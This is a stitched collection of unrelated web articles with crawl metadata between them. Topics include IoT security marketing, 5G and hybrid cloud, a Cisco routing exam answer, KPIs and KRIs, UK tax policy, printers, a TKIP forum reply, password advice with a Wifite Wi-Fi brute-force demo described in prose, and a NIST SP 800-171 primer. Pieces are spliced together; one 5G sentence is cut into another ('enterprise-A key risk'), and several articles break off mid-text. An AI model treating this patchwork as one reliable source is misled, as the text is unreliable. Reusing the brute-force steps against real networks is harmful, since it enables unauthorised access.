The Internet of Things (IoT) is becoming widely adopted across all industries, including critical infrastructure sectors, such as healthcare, energy, telecommunications, and more. IoTs are valuable tools, boosting efficiency and productivity through big data and connectivity. Contrarily, however, the characteristics of IoTs mean they pose a cybersecurity risk – one that enterprises struggle to manage due to a gap in asset visibility.
The perfect target
In the first half of 2021, there were 1.5 billion attacks on IoTs – more than double the previous year. IoTs make the ideal target for several reasons. Primarily, these devices collect data – a lot of it – and for cybercriminals, data means money. Critical infrastructure, specifically healthcare, collect the most valuable data, with healthcare information selling for almost three times as much as personal information on the dark web. In some instances, the targeted IoT possesses the sought-after data; in others, the connectivity of IoTs means a device acts as a gateway to valuable data.
Similarly, their connectivity means IoTs provide an access point to more critical systems; the compromised IoT is not always the intended target, but their accessibility means they are easier to infiltrate. For critical infrastructure, IoTs (or rather, IIoTs and IoMTs) enable IT and OT convergence. As such, physical equipment is vulnerable to attacks originating in the IT domain, in which the consequences are much more severe.
See no evil
A lack of Layer 1 visibility means security teams struggle to see what devices are operating in the infrastructure. Research finds that 75% of enterprises are experiencing a widening visibility gap in their IoT devices – a challenge not palliated by the fact that IoT security projects fell by 16% in 2021. In short, enterprises do not actually know what their IoT devices are, and with the increasing number of IoTs in use, this is a significant problem.
One such challenge associated with a lack of visibility is that enterprises do not know the components of their IoTs, having been manufactured by different vendors. Raspberry Pis, which many IoTs and IoMTs rely on for operability, go undetected by existing security solutions yet are highly vulnerable to exploitation. One of our healthcare clients, when using our HAC-1 solution, discovered that hundreds of Raspberry Pis were embedded within their critical IoMTs, none of which had gotten detected by their security tools.
Additionally, IoTs, being non-802.1x compliant, get authenticated by alternative protocols, such as MAB and MACsec – both of which rely on a device’s MAC address for authentication. However, MAC addresses are easily spoofed, and the gap in Layer 1 visibility means existing security solutions cannot differentiate between a legitimate and spoofed MAC address. Bad actors know this and exploit the vulnerability with rogue devices that impersonate legitimate IoTs by spoofing their MAC address.
Without complete visibility into their IoTs, enterprises lack the ability to properly enforce access policies and controls, such as Zero Trust and microsegmentation, a challenge that more than 60% of organizations face. Instead, access decisions are made based on incomplete or false (in the case of spoofing devices) information, unknowingly allowing vulnerable devices to operate on the same network segment as critical assets and providing rogue devices with access to the network.
Know your IoTs
The reliance on IoTs by critical infrastructure means there needs to be comprehensive and efficacious policy enforcement and security controls. Meeting such requirements starts with visibility – you can’t protect what you don’t know exists. Sepio’s HAC-1 solution provides a panacea to the gap in asset visibility by covering Layer 1, the physical layer. HAC-1 goes deeper than any other security solution, gathering Layer 1 data to bring complete visibility of all hardware assets, including IoTs. Every device gets detected for what it truly is, meaning vulnerable and malicious IoTs can no longer bypass security solutions and access controls. HAC-1’s Zero Trust Hardware Access approach enhances policy enforcement, ensuring that only authorized devices are granted access. The solution’s rogue device mitigation capability blocks unwanted, hidden, and rogue devices instantly, offering further protection against hardware-based threats.
Jessica Amado is Head of Cyber Research at Sepio, where she researches and covers multiple aspects of hardware-related cyber threats. She is a Regent’s University London graduate with First Class Honors in Global Business Management with Leadership and Management and holds an IDC Master’s in Government with a Specialization in Homeland Security and Counterterrorism. | <urn:uuid:261c5a07-7ccf-49b4-8847-3c48b4c593f5> | CC-MAIN-2024-38 | https://brilliancesecuritymagazine.com/cybersecurity/iots-know-a-lot-about-us-but-what-do-we-know-about-them/ | 2024-09-09T15:37:01Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651103.13/warc/CC-MAIN-20240909134831-20240909164831-00013.warc.gz | en | 0.946159 | 949 | 2.71875 | 3 |
Today, one of the most effective ways of processing and storing data is through a hybrid cloud model. Hybrid cloud utilizes robust servers for immediate data processing and video analytics at the edge and migrates data to the cloud for deep learning and archiving. When enterprises deploy on-premises storage connected to a private or public cloud, customers gain a foolproof solution that allows them to increase retention time and expand storage capacity as needed, while also reducing both capital expenditures and operational expenses.
When it comes to transferring video from endpoints, such as surveillance cameras, to servers at the edge or in centralized locations for storage, 5th generation (5G) wireless technology is positioned to be a game-changer. While 5G offers advantages for customers using the hybrid cloud model, such as improved video streaming and rapid download speeds accessing video from the cloud, there are also challenges, including cybersecurity risks, that clients will need to address.
The Capabilities of 5G
The 1980s watched 1G deliver analog telecommunications into the hands of eager buyers in the form of the first generation of wireless cellular technology. In the early 1990s, 2G built on the foundation of 1G, introducing functionalities such as encrypted phone conversations, SMS text messages, and significantly more efficient use of the radio frequency spectrum. Throughout the early 2000s, 3G introduced mobile data to the world, while the 2010s ushered in 4G LTE, along with a new era of mobile broadband.
Today, 5G uses revolutionary OFDM (orthogonal frequency-division multiplexing) methods to modulate digital signals across several different channels, reducing interference and making 5G exponentially faster and more accessible than previous models. 5G also brings greater bandwidth by expanding the use of spectrum resources, super-powering mission-critical communications and IoT networks with ease. In fact, 5G has 100x the network capacity compared to 4G, allowing for millions of devices, sensors, and systems to be connected to the same network in a small area. For Smart Cities projects, which aggregate video and data from thousands of surveillance cameras, license plate readers and other sensors, 5G offers a tangible advantage.
Another defining benefit of 5G is that it delivers ultra-low latency, near real-time inactivity. This is ideal for security applications that require rapid installation where infrastructure is low. Prime examples include outdoor concerts, festivals, and gatherings.
Challenges of 5G
For Smart City applications, ensuring video and data accessibility is key. This means choosing a reliable, enterprise-A key risk that a 5G network presents is increased exposure to cyber-attacks. As a public network, 5G increases the number of penetration points and exposure to hackers. If threat actors gain access to a 5G network, they can disrupt it, access data on the network, and sabotage infrastructure connected to the network. To mitigate these concerns, security manufacturers are building cyber defense protocols into devices that connect to 5G networks for heightened cyber protection.
5G and Hybrid Cloud
If a hybrid cloud model is powerful today using traditional broadband networks, introducing 5G will increase efficiency. Customers will be able to stream, review and access video from the cloud much faster. While 5G does offer lower latency for video transfer, in reality, this claim does not hold up without leveraging edge computing. Thus, for streamlined video recording, analysis and storage, customers should consider using a hybrid cloud model where video and data move from endpoints to servers at the edge, and lastly, to the cloud.
The same way 4G LTE ushered in a new era of mobile broadband; 5G is set to do the same. Experts anticipate 5G to grow quickly. 5G is now available in 1,336 cities globally, a 350 percent increase over the past year, as reported by Viavi Solutions Inc. (VIAVI). 5G is also forecasted to support “a wide range of industries and potentially enabling up to $13.1 trillion worth of goods and services,” according to Qualcomm’s 5G Economy study.
When designing video surveillance systems, customers who implement 5G network infrastructure and smart hybrid cloud storage models will set themselves up for success and experience better video performance. Clients who implement cyber protection best practices for the network, as well as network devices, will mitigate cyber threats. | <urn:uuid:8f1ea218-2f22-4497-a23c-7ed93a1ac647> | CC-MAIN-2024-38 | https://www.bcdvideo.com/blog/how-5g-will-improve-and-challenge-the-hybrid-cloud-model/ | 2024-09-09T14:17:07Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651103.13/warc/CC-MAIN-20240909134831-20240909164831-00013.warc.gz | en | 0.928713 | 880 | 2.71875 | 3 |
Refer to the exhibit. Users on the 172.17.22.0 network cannot reach the server located on the 172.31.5.0 network. The network administrator connected to router
Coffee via the console port, issued the show ip route command, and was able to ping the server.
Based on the output of the show ip route command and the topology shown in the graphic, what is the cause of the failure?
Click on the arrows to vote for the correct answer
A. B. C. D. E. F.C
The default route or the static route was configured with incorrect next-hop ip address 172.19.22.2 The correct ip address will be 172.18.22.2 to reach server located on 172.31.5.0 network. Ip route 0.0.0.0 0.0.0.0 172.18.22.2 | <urn:uuid:1caa6d3d-1de1-4b69-b1e0-da52a1da8b7c> | CC-MAIN-2024-38 | https://www.exam-answer.com/cisco/200-125/question541 | 2024-09-09T14:09:08Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651103.13/warc/CC-MAIN-20240909134831-20240909164831-00013.warc.gz | en | 0.934178 | 190 | 2.9375 | 3 |
Even though many organisations use the terms Key Performance Indicators (KPIs) and Key Risk Indicators (KRIs) interchangeably, they actually are two different tools with different purposes. Let’s take a look at what they are and how they are different.
Key Performance Indicators (KPI)
Key Performance Indicators (KPIs) are the gauges and measurements an organisation uses to understand how well individuals, business units, projects and companies are performing against their strategic goals.
Once an organisation has identified its strategic goals, KPIs serve as monitoring and decision-making tools that help answer your organisation’s key performance questions.
For more information on KPIs you can:
Key Risk Indicators (KRI)
Key Risk Indicators (KRIs), as the name suggests, measure risk. KRIs are used by organisations to determine how much risk they are exposed to or how risky a particular venture or activity is.
KRIs are a way to quantify and monitor the biggest risks an organisation (or activity) is exposed to. By measuring the risks and their potential impact on business performance, organisations are able to create early warning systems that allow them to monitor, manage and mitigate key risks.
Effective KRIs help to:
- Identify the biggest risks.
- Quantify those risks and their impact.
- Put risks into perspective by providing comparisons and benchmarks.
- Enable regular risk reporting and risk monitoring.
- Alert key people in advance of risks unfolding.
- Help people to manage and mitigate risks.
The relationship between KPIs and KRIs
While KPIs help organisations understand how well they are doing in relation to their strategic plans, KRIs help them understand the risks involved and the likelihood of not delivering good outcomes in the future. This means KRIs can be the flipside or KPIs.
Here are three examples that illustrate this relationship:
- A company might establish a KPI to measure IT system performance and a complementary KRI to track IT vulnerability to cyberattacks.
- Perhaps a company creates a KPI to monitor its market share growth because that’s a key business objective. A KRI linked to the same goal could monitor the risks of losing market share due to customer shifts or new competition.
- A company might measure staff engagement or staff satisfaction as important KPIs and monitor the likelihood of losing key staff and the risks to their employer brand as KRIs.
So, in a nutshell:
KPIs and KRIs are not the same. KRIs help to quantify risks, while KPIs help to measure business performance.
Where to go from here:
How Do You Develop Key Risk Indicators (KRIs)? And How Do They Differ From KPIs?
What Is A Leading And A Lagging Indicator? And Why You Need To Understand The Difference | <urn:uuid:004f5966-3391-4100-a98d-2193ccc0f248> | CC-MAIN-2024-38 | https://bernardmarr.com/the-difference-between-a-kpi-and-kri/?paged1077=4 | 2024-09-10T18:18:46Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651303.70/warc/CC-MAIN-20240910161250-20240910191250-00813.warc.gz | en | 0.951711 | 584 | 2.640625 | 3 |
As government expenditure continues to swell, think tanks like the National Institute of Economic and Social Research and the Institute for Fiscal Studies warn of an unavoidable reality: tax hikes seem inevitable. To sustain and improve public services without compromising fiscal rules, future governments will have to navigate the tenuous balance between economic growth and additional revenue through taxation. This article explores the potential pathways and their implications for a society accustomed to relatively low taxation models.
The Case for Tax Hikes
The Economic Rationale
The economic rationale behind the impending tax increases is unambiguous. Public services, cherished by citizens and foundational to a functioning society, require adequate funding. The current American-style tax model in the UK, characterized by relatively lower tax rates, stands at odds with citizens’ aspirations for European-level services. The math is simple and unforgiving; the quality and scope of public services will inevitably fall without an influx of revenue. This has led economic experts to question not if, but how taxes will rise.
The Institute for Fiscal Studies articulates the need for tax hikes as a matter of arithmetic. Balancing budgets is not merely an exercise in political will but an economic necessity. With every passing year, the difficulty of adhering to this balancing act grows, especially in light of evolving demographics and increased demand for healthcare and pensions. Moreover, economic shocks such as recessions or pandemics only exacerbate the strain on government finances, leading to a more pressing need for action on the taxation front.
Political Palatability and Public Reception
Politically, tax increases are a minefield. Successive governments have shied away from direct tax hikes, opting instead for stealth methods like freezing income tax thresholds. These gradual changes, while initially less palpable, have started to raise public awareness and ire, diminishing their utility as a long-term solution. Moreover, the political narrative often revolves around ‘taxing the rich’—a strategy that fails to produce the necessary revenue due to the limited size of the affluent cohort.
The difficulty inherent in raising taxes is not simply a matter of public acceptance but also the effect on the economy. Tax hikes can dampen consumer spending, discourage investment, and exacerbate wealth inequality if not carefully designed. The challenge for policymakers is to devise tax increases that are neither economically detrimental nor politically unviable. Yet, as the fiscal demand grows, these political concerns may need to take a backseat to the practical reality of funding public services.
Potential Avenues for Taxation
Addressing Wealth and Corporate Taxes
Wealth taxes targeting the rich and corporate taxes have been touted as possible solutions to the looming fiscal challenges. However, they often fail to generate the required revenue. For instance, a 1p increment in the additional rate for high-income earners would fetch a paltry £157 million—insignificant in the grand scheme. Similarly, while corporate taxes are a potential goldmine, international competition and the need to attract business can limit the rates that governments are willing to impose.
The reality is that broad-based taxes are the financial workhorses of government programs. Taxes such as VAT and employer contributions to payroll taxes like National Insurance are robust and consistently reliable. While less targeted, increases to such taxes can prove more profitable and less discriminatory, laying a fairer tax burden across the economic spectrum. Yet, it is critical that any increases maintain a balance that does not disproportionately affect low-income earners or deter business development.
Incremental Changes in Broad-Based Taxes
Incremental changes in broad-based taxes like VAT or National Insurance could provide the answer for funding public services. These incremental shifts can spread the tax burden more evenly across the population, avoiding the pitfalls of targeting narrow tax bases. However, public reaction to such changes remains unpredictable, and the government must tread carefully to navigate the potential backlash from a public unaccustomed to significant tax adjustments. | <urn:uuid:8acb1fa2-301b-4bbe-bdae-40e7255daee9> | CC-MAIN-2024-38 | https://governmentcurated.com/economic-and-fiscal/is-a-tax-increase-inevitable-for-sustaining-public-services/ | 2024-09-11T22:29:42Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651405.61/warc/CC-MAIN-20240911215612-20240912005612-00713.warc.gz | en | 0.945028 | 783 | 2.546875 | 3 |
Laser vs Inkjet Printer: What is the difference between Inkjet and Laser printers?
Printers are essential accessories for both the home and the office, with laser and inkjet printers the typical choice for most businesses. Modern printers take care of all your printing needs with efficiency and ease. Deciding between a laser printer vs an inkjet is a vital decision.
Making the wrong choice can lead to decreased productivity and increased costs. These issues become acute for small businesses.
Below, we compare laser and inkjet printers based on various factors and their strengths to determine which is better for your business – a laser printer or an inkjet.
On this page:
What is a Laser Printer?
Perfect for printing vast volumes of documents, laser printers are generally used in office environments. Laser printers use powder toner to create a digital image on paper.
Laser printers are expensive and use toner cartridges but prove economical in the long run with low cost per page and fast print speeds.
Laser printers can print 600 dots/inch in high resolution.
What is an Inkjet Printer?
The most widely used type of printer, inkjet printers, create digital images from a computer by spraying tiny ink droplets onto the paper.
These printers are available in several forms, from compact, affordable consumer models to more expensive professional versions.
They can be used to print text documents and colored images of high quality. Moreover, they are ideal for low-volume printing requirements.
Laser vs Inkjet Printer: How do inkjet printers and laser printers compare?
Several factors need to be considered when comparing the differences between laser printers and Inkjet printers. Factors such as application, page yield, print volume, and print speed will help determine the best choice for your organization.
Laser printers cater to corporate requirements to print faster at about 15-100 pages per minute. Inkjet printers have a slower print speed of about 15 ppm. Because of the fast speed, laser printers can print more documents than inkjet printers and have a higher print volume per month.
The print volume measures how much a printer can print at a given time. A laser printer can print many documents and is ideal for office use. The print volume of an inkjet printer is low, considering its intended home use.
Most ink cartridges have an ink volume that can print anywhere between 135 and 1000 pages.
However, toner cartridges have a page yield ranging from 2000 to 10,000. While a laser printer seems to have a higher page yield, inkjet printers let users enjoy higher ink volume with ink tanks that repeatedly remove the need to replace cartridges.
Some of the latest models of ink tank printers can print up to 6000 pages with one cartridge. However, such vast quantities of ink in an inkjet printer make sense only if you use it regularly. If you don’t want to keep replacing cartridges frequently but are not sure if you will print regularly, a laser color printer is a better option for you. Ink tank printers are suited for those who want to print many documents every day.
Talking about cost-effectiveness, there are two factors you should consider when comparing laser and inkjet printers. The first is the upfront investment which refers to the cost of the printer. The other cost is the maintenance of the printer.
Inkjet printers are cheaper as they have simple technology and need lesser resources to design. Laser printers are more expensive to purchase as they involve complex technology. A laser printer from a reputed brand generally costs about $200, which is quite costly for simple printing jobs.
Cost Per Page
The best way to evaluate the cost-efficiency of a printer is the cost per page. It comes down to how much you spend on the ink cartridges and toner. An inkjet printer’s ink is generally more expensive than the toner used in a laser printer.
Depending on the model, it costs between 5-10 cents to print a page in black on an inkjet printer. Printing in color costs more, about 15-25 cents per page.
The cost associated with a laser printer is generally less as the toner cartridges are cheaper. Printing a page in black costs no more than 5 cents regardless of the printer model. It costs less than 15 cents per page of color printing with a laser printer.
How do you identify an Ink-Efficient Printer?The printer’s cost per page is used to determine ink-efficiency and can be calculated as follows: 1. First, identify what ink cartridge the printer uses 2. Find out the ink cartridge’s page yield. This is the number of pages a cartridge can print before becoming empty. Higher page yields Ink cartridges are more cost-efficient. 3. Divide the ink cartridge’s price by the page yield. The result is the cost per page. 4. Cost per page = Cartridge price $$$ / Cartridge page yield Looking for an Inkjet printer with the lowest cost per page?Although there are many factors to consider, many inkjet users praise the HP OfficeJet Pro 8035 All-in-One Printer, which produces black and white prints at around 4.9 cents per page and color prints for about 22 cents per page apiece. For great deals on printer ink visit HouseofInks! What is the cheapest cost per page Laser printer?With a cost-per-page of $0.08c (8 cents), the HP Color LaserJet Pro MFP M477fdw is considered a solid performer among multifunction color laser printers. This laser printer is a a dependable workhorse suited for both office and home/office environments operating at a reasonable printing cost. However, the lowest cost per page laser printer we found is the Brother Monochrome MFCL2750DW, coming in at around $0.04 (3.75 cents) per page. |
A printer resolution is measured in terms of ‘dots per inch (dpi)’. A printer with a resolution of 600 dpi is good enough to print documents of good quality, and 1200 dpi for good-looking colored pictures.
While there is a belief that the higher the resolution, the sharper the print details, in reality, there is hardly any difference in the quality after 1200 dpi. When you want to print professional photographs, you need to think about resolution.
The maximum resolution of inkjet printers is about 5000 dpi. Laser printers generally have a resolution of about 2400×600 dpi though newer models optimize their specifications to provide high resolutions.
A common suggestion for a home office printer is an inkjet model that suits occasional printing. However, there are some issues like ink drying up with these printers. Therefore, it is recommended that you opt for an affordable laser printer instead; the toner used by these printers doesn’t dry up.
If you need high-resolution colored prints regularly and print a small volume of documents, an inkjet printer will do the job. Laser printers can print vast quantities of documents regularly.
A monochrome printer prints only in black and white and need only a black cartridge to run. A laser printer is best if you have huge volumes of documents to handle daily. Though they were originally built for office use, their economic benefits have recently made them popular as home printers.
Laser printers are ideal for everyday color printing, but a photo inkjet printer is better for professional photo printing in high quality. Photo inkjet printers are designed to produce detailed pictures with a tonal variety that artists and photographers expect. Several models of inkjet printers use pigment-based ink that works with a variety of art papers and paper sizes.
So, the choice of printer for color printing comes down to your requirements. A photo inkjet printer is a suitable option if you need to print professional-quality pictures. However, if you don’t have such demands for quality, depth, and tonal range, a color laser printer is a better choice as it allows printing more pages from a cartridge and does not dry up if left unused.
Laser printers, being more powerful, are usually larger than inkjet printers. However, several laser printer models from different brands are built to be similar in size to inkjet printers.
The difference between a laser and inkjet printer depends on the model you choose, but multi-functional laser printers are generally the biggest. An inkjet printer is the better option if looking for a small printer that fits a restricted area in a home office.
Laser vs Inkjet Printer: Advantages and Disadvantages
Let’s review the benefits and limitations of both types of printers. Knowing about the pros and cons of each helps determine the right choice for you.
Laser Printer Pros
- Offer faster printing speeds
- Regardless of the volume, printing is always smooth
- Produce sharp black texts ideal for office documents
- Better capable of handling high-volume jobs
- More cost-effective for simple prints
Laser Printer Cons
- Take more time to warm-up
- The upfront cost is more
- Can’t handle a variety of paper
- Toner leaks are a trouble
- Generally bigger and heavier
- Not ideal for smooth pictures
Inkjet Printers Pros
- Ideal for graphics-heavy pictures and documents
- More affordable to buy
- Can handle a variety of paper and printing materials
- Better blending of smooth colors
- No warm-up time
- Cartridges can be refilled and reused
- Smaller, lighter, and easier to maintain
Inkjet Printer Cons
- Vulnerable to problems like smudging, fading, and water damage
- Cartridges require maintenance
- Slower than laser printers
- Generally have low capacity trays
- Output trays are not available in most cases
Original or compatible ink?
Compatible (or third-party) inks are unquestionably less expensive than OEM inks, but there are some drawbacks.
Firstly, original inks are of far higher quality than compatibles. Second, printer manufacturers frequently use “automatic upgrades”; when this occurs, compatible inks will not be acknowledged by your printer, leaving you with useless inks and a loss of money.
In addition, the guarantee may not be honoured by the manufacturer if you have been using inks that were not designed for your specific printer, so choose your ink wisely.
Whether you should get a laser or inkjet printer depends on what you want to print, the volume you need to handle, and the price you are willing to pay. Inkjet printers are generally compact, smaller and more affordable, and suited for image-heavy documents.
On the other hand, a laser printer is faster, more efficient, and economical when looking to print huge volumes of text documents.
Though laser printers require a higher upfront investment than inkjet printers, they have a lower cost per page and are more cost-effective in the long run. So, if you print many documents regularly, a laser printer can save you more. Replacing a toner cartridge also costs less in the long run than ink cartridges.
If you are after high volumes and speeds for business, a laser printer is a better choice. However, if you want something for occasional printing needs for your home, an inkjet printer is an ideal option. | <urn:uuid:4607a182-0ceb-4d90-9524-034fcbf48d4e> | CC-MAIN-2024-38 | https://www.businesstechweekly.com/productivity/document-imaging/laser-printer-inkjet/ | 2024-09-20T17:02:58Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701419169.94/warc/CC-MAIN-20240920154713-20240920184713-00013.warc.gz | en | 0.919988 | 2,337 | 2.515625 | 3 |
Very few organizations have fully incorporated all relevant risks and threats into their current digital strategy, research finds.
Today, all organizations are digital by default. However, it has never been more difficult for organizations to map the digital environment in which they operate, or their interactions with it. Every organization's technology infrastructure is both custom-made and increasingly complex, spanning networks that consist of tools and technologies that may be on-premises or in the cloud — or, quite commonly, a combination of both.
Yet there is no reward without risk. Digital business inherently means utilizing new technology, connecting devices and operating platforms, embracing different ways of working, building large-scale data silos, and so on. The convergence of Internet of Things networks with what were once separate and self-contained — and therefore more manageable — systems represents a fundamental change.
The World Economic Forum now rates a large-scale cybersecurity breach as one of the five most serious risks facing the world today. The scale of the threat is expanding drastically: by 2021, the global cost of cybersecurity breaches will reach $6 trillion according to Cybersecurity Ventures' 2017 Cybercrime Report, double the total for 2015.
Spending Keeps Soaring
Coping with digital challenges and mitigating risks still represents a major burden for organizations across the board. To gain cyber resilience and combat cybercrime, organizations continue to increase their spending on cybersecurity. Of 1,200 C-suite leaders and other senior executives polled by EY for the 2017-18 Global Information Security Survey (GISS), 70% say they require up to 25% more funding, and the rest require even more than this. However, only 12% expect to receive an increase of more than 25%.
For many organizations, the worst may have to happen for these calls to be met. Asked what kind of event would result in cybersecurity budgets being increased, 76% of survey respondents said the discovery of a breach that caused damage would be lead to greater resources allocated.
By contrast, 64% said an attack that did not appear to have caused any harm would be unlikely to prompt an increase in the organization's cybersecurity budget. This is higher than the figure reported last year — which is concerning, given that an attack can cause harm that isn't immediately obvious.
The Threat Landscape Evolves at Lightning Speed
EY's survey shows that organizations are also increasingly fearful about the vulnerabilities within new channels and tools. For example, 77% of survey respondents worry about poor user awareness and behavior exposing them to risk via a mobile device; the loss of such a device and the potential for loss of information and an identity breach are a concern for 50%, according to EY's findings.
With so many disparate threats — and perpetrators that could be anyone from a rogue employer to a terrorist group or a nation-state — organizations must be vigilant across the board and be well acquainted with their own threat landscape. All the more so since attackers have easy access to malware and sophisticated tools — and can even hire cybercriminals — online.
Employees and criminal syndicates are seen as the greatest immediate threats. For many organizations, the most obvious point of weakness will come from an employee who is careless or fails to heed cybersecurity guidelines.
Organizations may feel more confident about confronting the types of attacks that have become familiar in recent years, but they still lack the capability to deal with more-advanced, targeted assaults. Overall, 68% of respondents have some form of formal incident response capability, but only 8% describe their plan as robust and spanning third parties and law enforcement.
To improve their chances of fighting back against cyberattackers, organizations will have to overcome the barriers that currently make it more difficult for cybersecurity operations to add value. For example, 59% of GISS respondents cite budget constraints, while a similar number lament a lack of skilled resources; 29% complain about a lack of executive awareness or support.
The so-called disconnect between cybersecurity and the C-suite still persists, with a mere 36% of corporate boards having sufficient cybersecurity knowledge for effective oversights of risks, as highlighted in the EY report. Ultimately, organizations that fail to obtain executive support and devote the resources necessary for adequate cybersecurity will find it very difficult to manage the risks they face.
The findings suggest organizations increasingly recognize this: 56% of respondents say either that they have made changes to their strategies and plans to take account of the risks posed by cyber threats, or that they are about to review strategy in this context. However, only 4% of organizations are confident they have fully considered the cybersecurity implications of their current strategy and incorporated all relevant risks and threats.
Due to their digital transformation, organizations inevitably expose themselves to greater cyber-risks and an ever-increasing dependency on their IT. Breaches and outages are on the rise. Although both have always been painful, the business impact is growing exponentially; if organizations are offline, revenue streams are cut off and reputation is at risk. With security incidents continuing to rise, it is clear that attackers are finding new sources of profit even as companies prioritize the protection of their digital assets.
Many businesses have increased investments in security, but these investments often follow an approach that utilizes technology to build a defense. Increasingly, firms will realize that they must also detect the inevitable breaches and respond quickly.
Beyond the technical aspects, organizations will also begin building business processes that enhance security, and they will implement end-user training to mitigate human error. In short, companies must shift their security mindset from technology-based defenses to proactive steps that include technology, process, and education. There is no doubt that companies are taking security more seriously, but now they must realize that modern security demands a different mentality rather than just more of the same.
First appeared on DARKReading | <urn:uuid:9e122342-f847-4682-8b3e-6639c1bdb777> | CC-MAIN-2024-38 | https://resources.experfy.com/iot/modern-cybersecurity-demands-a-different-corporate-mindset/ | 2024-09-08T12:26:43Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651002.87/warc/CC-MAIN-20240908115103-20240908145103-00213.warc.gz | en | 0.961177 | 1,171 | 2.515625 | 3 |
in the CWSP book on page 391,it is mentioned that "the IV has a third byte component that is used in addition to TSC0 and 1 to help prevent creation of weak IVs and to create the 24bit IV length".
which one out of the remaining 4 bytes is the third byte: TSC 2,3,4,5? -
The third byte of the 24 bit sequence is actually an 8-bit value that helps prevent the resulting IV from being "weak." Some resources will list this as a Dummy Byte value, but the intent is to ensure that the combination of TSC0, TSC1, and this byte result in a non-weak IV value.
where does this third byte come from?
The "third byte" is the WEP seed described in d) below.
IEEE 802.11 section 22.214.171.124 TKIP overview
"The TKIP is a cipher suite enhancing the WEP protocol on pre-RSNA hardware. TKIP modifies WEP as follows:
"a) A transmitter calculates a keyed cryptographic message integrity code (MIC) over the MSDU SA and DA, the MSDU priority (see 126.96.36.199), and the MSDU plaintext data. TKIP appends the computed MIC to the MSDU data prior to fragmentation into MPDUs. The receiver verifies the MIC after decryption, ICV checking, and defragmentation of the MPDUs into an MSDU and discards any received MSDUs with invalid MICs. TKIP?¡é?€??s MIC provides a defense against forgery attacks.
"b) Because of the design constraints of the TKIP MIC, it is still possible for an adversary to compromise message integrity; therefore, TKIP also implements countermeasures. The countermeasures bound the probability of a successful forgery and the amount of information an attacker can learn about a key.
"c) TKIP uses a per-MPDU TKIP sequence counter (TSC) to sequence the MPDUs it sends. The receiver drops MPDUs received out of order, i.e., not received with increasing sequence numbers. This provides replay protection. TKIP encodes the TSC value from the sender to the receiver as a WEP IV and extended IV.
"d) TKIP uses a cryptographic mixing function to combine a temporal key, the TA, and the TSC into the WEP seed. The receiver recovers the TSC from a received MPDU and utilizes the mixing function to compute the same WEP seed needed to correctly decrypt the MPDU. The key mixing function is designed to defeat weak-key attacks against the WEP key."
I hope this helps. Can you add your location to your forum profile? Thanks. /criss - | <urn:uuid:058d4ca7-1627-4b39-806a-56c696b9268d> | CC-MAIN-2024-38 | https://www.cwnp.com/forums/posts?postNum=298661 | 2024-09-14T13:27:33Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651579.38/warc/CC-MAIN-20240914125424-20240914155424-00613.warc.gz | en | 0.900675 | 602 | 2.65625 | 3 |
Having a strong password for every application you use is crucial, as hackers can easily decipher basic passwords in minutes. A recent demonstration by an engineer showed how simple it is to hack into a user's account if they use a simple password. In this short, three-minute YouTube video, it took the engineer 2 minutes and 28 seconds to guess the password "superman," giving him complete access to the wireless connection by brute forcing its password.
What steps were used to brute-force the password?
The engineer installed KaliHunter on his Android phone and launched a functionality called Wifite. He then selected a wireless connection and used Wifite to automate discovering, cracking, and logging into the network. He exchanged information, including the device's MAC address, the wireless network's SSID, and the network's password (encryption key). In a matter of minutes, the password "superman" was successfully guessed.
Here is the 3-minute YouTube short showing how the white-hat hacker did it.
This is only one way hackers can attack your systems. Follow these password guidelines to prevent hackers from accessing your personal data.
- Infiniwiz warns against using the same password repeatedly on the websites you use. If your password is ever stolen and you use it frequently, hackers will have no trouble accessing the information on other websites.
- Passwords should have a minimum of 12 characters and include upper/lower case letters, digits, and special characters. While 9-10 characters should be enough, processing rates at least double every year, allowing hackers to "brute force" passwords faster. Choosing 12 characters will ensure you don't have to repeat the same practice in five years.
- Remembering complex passwords without duplicating them is impossible, so use a password management software like 1password.com.
- A word preceded or followed by a single number should also be avoided (e.g., Password1). Hackers will try guessing your password using word lists and popular passwords.
- Avoid using details in your password that could be known about you or found in your social media accounts (such as birthdays, the names of family members, hobbies, etc.).
- Avoid using a system to create passwords based on vendor or otherwise. For example, if you're creating a password for Amazon.com, making the password a1m1a1z1o1n1 will not help you.
Our job is to help companies create more unified business functions, improve customer service, and utilize technology to move forward. Chicago-experienced IT consulting experts will make your technology work for you and keep you from spending endless, frustrating hours managing your business IT. Managed IT is when the Infiniwiz team proactively takes care of all the IT headaches and hassles for you…So you can get done on your "to-do" list – like growing the business! | <urn:uuid:a20e164d-fe2a-4ec5-8094-5a1924cea063> | CC-MAIN-2024-38 | https://www.infiniwiz.com/kali-nethunter-allows-hackers-access-to-easy-passwords-in-two-minutes/ | 2024-09-15T20:15:56Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651647.78/warc/CC-MAIN-20240915184230-20240915214230-00513.warc.gz | en | 0.934071 | 591 | 3.15625 | 3 |
What is NIST SP 800-171?
Contact Us | |
Free Demo | |
Chat | |
Learn about NIST SP 800-171, a set of guidelines designed to ensure federal data remains confidential when shared in nonfederal systems, what it covers, requirements, and more, in this week's Data Protection 101.
NIST SP 800-171 is an important set of guidelines that aim to ensure the safety and confidentiality of sensitive federal data. Here’s a look at what NIST encompasses and what’s required of affected entities.
Definition of NIST SP 800-171
NIST SP 800-171 is a document of guidelines published by the National Institute of Standards and Technology (NIST) in 2015, with compliance required as of December 31, 2017. The purpose of the guidelines is to “ensure that sensitive federal information remains confidential when stored in nonfederal information systems and organizations.” Enforcement of these regulations is handled directly by the Department of Defense, making compliance absolutely mandatory.
There are unavoidable occasions where federal data (any data related to the federal government) is held or received by third parties. Contractors and executive agencies who aid federal agencies commonly store or transmit sensitive data. These cases are regulated by NIST SP 800-171.
Cyber threats are ever-increasing and becoming more sophisticated. For this reason, the NIST guidelines have been revised a number of times. In fact, the initial version was replaced by NIST SP 800-171 Rev. 1. “Rev 1” has since been updated three times. It’s current version (as of this article being written) was updated on June 7th, 2018.
What Does NIST SP 800-171 Rev. 1 Cover?
The NIST document sets security regulations in 14 different categories, including:
